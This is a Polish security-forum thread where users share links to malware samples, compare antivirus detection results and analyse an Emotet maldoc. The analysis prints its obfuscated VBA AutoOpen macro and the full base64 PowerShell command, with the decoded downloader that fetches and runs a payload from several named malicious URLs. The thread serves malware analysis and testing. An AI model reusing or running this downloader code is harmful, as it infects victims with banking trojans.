[malware]
[
attachment=1397]
hasło - malware
[Aby zobaczyć linki, zarejestruj się tutaj]
[/malware]
Z życia wzięte. Comodo i MBAM nic.
Ostrzeżenia Firefoksa zauważyły szkodnika przy pobieraniu.
(16.09.2019, 20:33)Mcin napisał(a): [Aby zobaczyć linki, zarejestruj się tutaj]
[malware]
[attachment=1397]
hasło - malware
[Aby zobaczyć linki, zarejestruj się tutaj]
[/malware]
Z życia wzięte. Comodo i MBAM nic.
Ostrzeżenia Firefoksa zauważyły szkodnika przy pobieraniu.
Zaciemniony skrypt powershell. Pobiera i ładuje trojana Emotet. Comodo przy wykonaniu pliku wykonywalnego powinien ten rodzaj VirusScopem wykryć.
Mogę dodać że Emotet dodatkowo ładuje trojana bankowego Trickbot
[malware]https://1drv.ms/u/s!AtTiI3pG5DGqlXOPzRHZf8Hh68_I?e=odqA3a[/malware]
Czym analizowałeś? Ja tylko na szybko próbowałem "manualnie" prześledzić VBA i przegrałem. Otwierałem plik w Comodo Sandbox, więc możliwe, ze kod dodatkowo "zaciemnił się" jak wykrył odpalenie w piaskownicy.
30 Malware
Hasło: infected
[malware]https://www50.zippyshare.com/v/9oV9sKxN/file.html[/malware]
Windows Defender podczas skanowania pozostawił 8 plików
Eset 14/30
Przepuścił ,,copia fattura.dox.exe - pinfile , reszte dokument programu microsoft office + rtf
do 20:43
symantec ===== +--+-+-++-+-++--+++-++++++++-+
fortinet ===== ++-+--+++---+-+--++-+-+-+--+-+
mcafee ======= +-+++++++-++++--++++++++++++-+
trendMicro === ++-++++++-++++--+++--++---++++
Qihoo-360 ==== ++-++++++-++++--++-+-++-++++++
Arcabit ====== --+++++++-++++--+--++++-+-++--
kaspersky ==== -+-+--+-++-+-----++++-+----+++
+ wykryty
- nie wykryty
Lepszy mcafee według sygnatur
20 Malware
[malware]https://www18.zippyshare.com/v/Gpu6LSmT/file.html[/malware]
20:54
Symanyec ====01100010011000001010
fortinet ======00110110011001011101
Qihoo-360 ====01110111111011011000
Arcabit ======00111100011011000001
Kaspersky ====00111111111001011111
(18.09.2019, 21:58)Mcin napisał(a): [Aby zobaczyć linki, zarejestruj się tutaj]
Czym analizowałeś? Ja tylko na szybko próbowałem "manualnie" prześledzić VBA i przegrałem. Otwierałem plik w Comodo Sandbox, więc możliwe, ze kod dodatkowo "zaciemnił się" jak wykrył odpalenie w piaskownicy.
Sam kod makra jest zaciemniony. Widać po funkcji AutoOpen - czyli działa kiedy program jest uruchomiony.
Kod:
Function lFZOPK()
Dim aHYQwzoR As Object
If 599 = 777 Then
Dim itPUDGz As Boolean
Select Case G4Bo7k
Case 386
Dim AL7CLMI As Boolean
zYYwaGOq = IhmjFvnQ
Dim YcqNToF As Boolean
VjHjGHY = 232
Dim jwz954 As Boolean
Un2Sj8QU = CVar(604)
Dim lKdzAjS As Boolean
Case 497
Dim CBfbrn As Boolean
FsfizzX = sG2k2Lo
Dim z36wQqRr As Boolean
tLKpPXJn = CVar(wWFhhpLw)
Dim r32Bqc As Boolean
W1RGcdX = 510
Dim XmMsiqmv As Boolean
End Select
End If
jYf5B8 = MJC9G0Z + ThisDocument.iJmHiTkN.Caption + ThisDocument.bNFNUwA.Caption + ThisDocument.Fkrsjt.Caption + J1lpHN0R
Dim p1G45Hb As Object
If 884 = 630 Then
Dim p8wlPzQ As Boolean
Select Case S7m7oU
Case 829
Dim aCHLjaX As Boolean
b3qkrCL = wHH6ctOf
Dim B3MwijmZ As Boolean
Mjb7pQ = 846
Dim kq4b85VN As Boolean
iY9Ebom = CVar(534)
Dim FHDEolw As Boolean
Case 420
Dim kLQLViw As Boolean
f7SaVQAz = IFwU87
Dim hlP1IX5 As Boolean
RZDiRH = CVar(pCqzwD)
Dim iWX52UQ As Boolean
Itlwz6hz = 454
Dim VJu40_TJ As Boolean
End Select
End If
Dim dItr2wmk As Object
If 257 = 989 Then
Dim A7wOHw As Boolean
Select Case HFtrwGdC
Case 68
Dim JFCKFiU3 As Boolean
qihi0X = ShXEhb
Dim w3UnNw As Boolean
UsK21O5P = 51
Dim upiKtaT As Boolean
EhGjmT8j = CVar(168)
Dim sCBU1JR As Boolean
Case 307
Dim PInHwFhM As Boolean
H5T4HEKS = b5qbtcZ
Dim lBbNXB As Boolean
VUiEHVw = CVar(cJ5Qp2I)
Dim VcLZUqo As Boolean
osr82kmv = 563
Dim ZZj5HF6 As Boolean
End Select
End If
d3Tp9rq = CreateObject("winm" + "gmts:Win32_Process").Create(jYf5B8 + tvqtsm, zsCf4EY, Jvf6up, FwYijVmC)
Dim zwhNqkY As Object
If 698 = 468 Then
Dim jXNznD1 As Boolean
Select Case uoH2vo
Case 512
Dim Gc_YrU As Boolean
Bd9GEZbS = cSUq52E
Dim IRGB4pi As Boolean
oE7DnFml = 757
Dim EiMzKR As Boolean
tbiITr = CVar(539)
Dim X6bEbk9 As Boolean
Case 605
Dim jiipOET As Boolean
v59d7vzZ = UovOHO
Dim IwzfhsTi As Boolean
ioWPKdz = CVar(z_rSB97)
Dim tTXblYJL As Boolean
SQJYBKz = 583
Dim HiScEzo As Boolean
End Select
End If
End Function
Kod:
Function Jvf6up()
Dim OAOXKIT As Object
If 441 = 219 Then
Dim Md9cXIGv As Boolean
Select Case UjMS9t8
Case 869
Dim HbW8pS As Boolean
znVnXajj = YTZ8lZ3
Dim DsQoOXMk As Boolean
bSKaXJIc = 223
Dim HrzZQd As Boolean
K29Eob4D = CVar(467)
Dim FPK1CnBK As Boolean
Case 830
Dim Bwc81_sY As Boolean
Uv6jYm7c = cUcKVw3T
Dim UFKjpY As Boolean
MouiI1 = CVar(Robarjj)
Dim kVSmDIY As Boolean
XTlW2_N7 = 576
Dim zDMnk_ As Boolean
End Select
End If
Set Jvf6up = CreateObject(MqdIdWiL + ThisDocument.jdjjB3.Caption + "Startup" + YzR3kU)
Dim w7iUZz As Object
If 587 = 104 Then
Dim qOFuiv2 As Boolean
Select Case EOT98_q
Case 200
Dim UKiGflJ As Boolean
KZmsud = Dufwdmf6
Dim IHB7w2A As Boolean
Fstfl5s = 286
Dim vXf1DH7 As Boolean
j7j0MjH0 = CVar(321)
Dim OlvsWE As Boolean
Case 236
Dim RP63v9 As Boolean
d0UE6A = Tc1IfKXm
Dim T6JpIvP_ As Boolean
DwKl_MAJ = CVar(FQt3V5O)
Dim J3SiDkF As Boolean
rjz7bMzm = 523
Dim HTKO08 As Boolean
End Select
End If
Jvf6up. _
ShowWindow! _
= iL9EzZ + wSHNOE + EEYYtw + qXAUaDRG + KzwL3DM + NDt9Y8D
Dim CXLcvn As Object
If 152 = 41 Then
Dim ohsCXm As Boolean
Select Case AZbwSW
Case 60
Dim WNENMU_0 As Boolean
bpLkki = IhN29z
Dim LLMvwqa As Boolean
cjUzch = 273
Dim IFI9a14 As Boolean
KafkPR = CVar(459)
Dim Fwzwb2Os As Boolean
Case 631
Dim zWZsAf As Boolean
kUjwWTpr = zcSRkJ
Dim wuuP5P4w As Boolean
iiaAOdka = CVar(XiHuXO)
Dim mszPWR As Boolean
CdaU7iZ = 994
Dim Ak0Nzs As Boolean
End Select
End If
Dim o5ILTN As Object
If 780 = 603 Then
Dim SpXhP_ As Boolean
Select Case rMHiNNS
Case 105
Dim Z9mnsjz As Boolean
BQWCpYDS = BD5Qd9iP
Dim pjlnv1 As Boolean
aoJlcj = 981
Dim Dwhtb7BX As Boolean
irIqKRn = CVar(884)
Dim XptS1Jzw As Boolean
Case 211
Dim XlXSj5us As Boolean
siOJXOi = Z39YjjSV
Dim imJikBzN As Boolean
oajMdF6 = CVar(vllu8D6)
Dim qzOiOA As Boolean
lDoHlBJi = 420
Dim Pw6il3 As Boolean
End Select
End If
End Function
Sub autoopen()
Dim Ykqda3 As Object
If 600 = 931 Then
Dim sS86IEI5 As Boolean
Select Case LcSbVXUc
Case 131
Dim vuuiHG As Boolean
C8_PhR = infQSKiZ
Dim lCOTI0r_ As Boolean
dZzBs1 = 618
Dim u96B8Wz As Boolean
v7vMVrIY = CVar(841)
Dim nwAiiY As Boolean
Case 169
Dim J1djcUM As Boolean
DrF4jbCz = vNspnX
Dim b4aWok As Boolean
sdWdaA1 = CVar(kPKPX0)
Dim McMdL2L As Boolean
imdsDf = 911
Dim ijals6Y6 As Boolean
End Select
End If
lFZOPK
Dim P02l7jG As Object
If 143 = 700 Then
Dim nw2jif As Boolean
Select Case Bi4cGHA
Case 910
Dim wUnqp5H As Boolean
tzvROwO = ntoGvT
Dim wfDL21n As Boolean
oFcG4tU = 846
Dim InvTFO_ As Boolean
MA4kUq = CVar(426)
Dim fJWB_HAo As Boolean
Case 311
Dim i54_UJ As Boolean
SmpZzL = UQsMvzz
Dim IllKfv As Boolean
DVNXPr = CVar(JTqQMUK)
Dim lv7zY4F As Boolean
Hij0230V = 744
Dim bLJj0vkd As Boolean
End Select
End If
End Sub
Potem następuje wywołanie powershell w celu uruchomienia zaciemnionego skryptu, który jest zaciemniony w base64, a samych takich warstw zaciemnienia może być ponad 30 nawet.
Kod:
PROCESS: powershell.exe [2000]
FILE: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMDLINE: powershell -enco JABrAEsAbgBtAFAAUwA9ACcAUwBZAHAAMwBxAFIAJwA7ACQAWgBNAFEAUwBfAG0AYQAgAD0AIAAnADIANwA5ACcAOwAkAGMATwBqAHAAOABtAD0AJwBLAHcAaABUAF8AZgAnADsAJABvAGMAQQA3AGYAegB2AEgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoATQBRAFMAXwBtAGEAKwAnAC4AZQB4AGUAJwA7ACQAagBRAGoASgAyAHYAbgBTAD0AJwBtAEkAaAAxADYAXwBIACcAOwAkAHQAVgBmAFUAWQBtAE8AXwA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAHQALgBXAGUAQgBDAEwASQBFAE4AVAA7ACQAYwBKAEUAaQBzAHQAcwA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHMAdQBuAGYAbABhAGcAcwB0AGUAZQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdAAzAGEAbwBoADMAMQA1ADQAOQA2AC8AQABoAHQAdABwAHMAOgAvAC8AaABvAHQAZQBsAGsAcgBvAG0AZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdABhAGsAagAwADUANQA5ADMAMgAvAEAAaAB0AHQAcAA6AC8ALwBmAG8AbABsAG8AdwBlAHIAZwBvAGQAcwAuAGMAbwBtAC8AZgB1AGwAbABiAGEAYwBrAHUAcAAvAGgAZgAwAG8AdAAwADQANgA2ADMALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHMAdABhAHIAdAB1AHAAZgBvAHIAYgB1AHMAaQBuAGUAcwBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AZgB1ADEAMAA5ADAAMgAwAC8AQABoAHQAdABwAHMAOgAvAC8AcgBlAGYAZgBlAHIAYQBsAHMAdABhAGYAZgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG4ANgA5AC8AJwAuACIAUwBQAGAAbABJAFQAIgAoACcAQAAnACkAOwAkAEsAUQBsAHUAaQB0AD0AJwBiAHEAOQBYADQAWgAnADsAZgBvAHIAZQBhAGMAaAAoACQAdwB6AG0AMABIAHEAagA3ACAAaQBuACAAJABjAEoARQBpAHMAdABzACkAewB0AHIAeQB7ACQAdABWAGYAVQBZAG0ATwBfAC4AIgBkAGAAbwBXAGAATgBMAE8AQQBkAGAARgBpAEwARQAiACgAJAB3AHoAbQAwAEgAcQBqADcALAAgACQAbwBjAEEANwBmAHoAdgBIACkAOwAkAEIAcwBCAEwAegBsAFIARwA9ACcAbgBrAFgAMgBpAEwAQwBiACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAbwBjAEEANwBmAHoAdgBIACkALgAiAEwAYABFAE4AZwBgAFQASAAiACAALQBnAGUAIAAyADEAMAAyADUAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGEAYABSAHQAIgAoACQAbwBjAEEANwBmAHoAdgBIACkAOwAkAGEAQQBiAFcAdABHAD0AJwBBADIAdQBXADEANQBSACcAOwBiAHIAZQBhAGsAOwAkAE8AbQBfAGYATABwADgANwA9ACcARwB3AFYAYgBXAHUANgBmACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHIARABpAG8AZgBpAEMAPQAnAGMAOABSAEYAUQBKACcA
Po odkodowaniu widoczne są złośliwe adresy z których zostaje pobrane złośliwe oprogramowanie.
Kod:
https://stackspay.com/wp-includes/0sxfg82114/@https://www.reza-khosravi.com/wp-content/q2/@http://w3brasil.com/sistema/p5q207/@https://www.pronhubhd.com/cgi-bin/m0cux6/@https://www.karenshealthfoods.com/wp-includes/95oos267/'."s`PLIt"('@');$FCoRz8lI='U8LdDj';foreach($NOBXzi in $XOJOsjW){try{$jjRBwGJH."do`WnloAdF`i`lE"($NOBXzi, $vnqpGqn);$f3rXzpb7='Q239rltn';If ((&('Get'+'-Item') $vnqpGqn)."lEn`GtH" -ge 20485) {[Diagnostics.Process]::"sT`ARt"($vnqpGqn);$Q5u0tj='iOzisLAA';break;$w24h4z='WQkubi'}}catch{}}$O98YDGEI='bSKzqk_'
np. jeden z nich:
[Aby zobaczyć linki, zarejestruj się tutaj]
Reszta na priv